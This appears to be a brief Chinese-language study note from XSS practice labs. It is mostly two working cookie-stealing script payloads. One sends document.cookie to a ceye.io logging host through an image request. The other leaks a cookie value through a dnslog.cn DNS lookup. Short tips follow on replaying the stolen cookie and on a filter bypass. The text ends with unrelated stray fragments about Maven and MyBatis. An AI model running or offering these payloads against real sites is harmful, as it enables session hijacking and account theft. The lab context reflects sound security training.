pteXSS模拟1
<script>
var img
=document.createElement("img");img.src="http://xxxxx.ceye.io/log?"+escape(document.coo
kie);document.body.appendChild(img);
</script>
重放加Cookie头
pteXSS模拟2
<script type="text/javascript">
var arr=document.cookie.split(/[;=]/);var url="http://"+arr[1]+".e0nv60.dnslog.cn/xxx.png";document.write('<img src="'+url+'"/>');
</script>
提交表单并刷新看dns返回记录
DNSLog Platform
pteXSS模拟3
尝试发现是除了大写外过滤
Java框架技术-Maven和MyBatis)
)
介绍及实现原理)
